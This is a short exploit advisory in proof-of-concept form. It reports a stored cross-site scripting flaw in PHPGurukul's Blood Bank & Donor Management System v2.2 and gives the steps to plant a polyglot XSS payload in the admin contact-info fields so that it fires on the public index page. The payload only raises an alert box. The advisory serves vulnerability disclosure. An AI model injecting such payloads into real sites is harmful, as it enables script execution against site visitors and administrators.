# Exploit Title: Blood Bank & Donor Management System using v2.2 - Stored XSS # Application: Blood Donor Management System # Version: v2.2 # Bugs: Stored XSS # Technology: PHP # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/blood-bank-donor-management-system-free-download/ # Date: 12.09.2023 # Author: SoSPiro # Tested on: Windows #POC ======================================== 1. Login to admin account 2. Go to /admin/update-contactinfo.php 3. Change "Adress" or " Email id " or " Contact Number" inputs and add "/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('1') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e" payload. 4. Go to http://bbdms.local/inedx.php page and XSS will be triggered.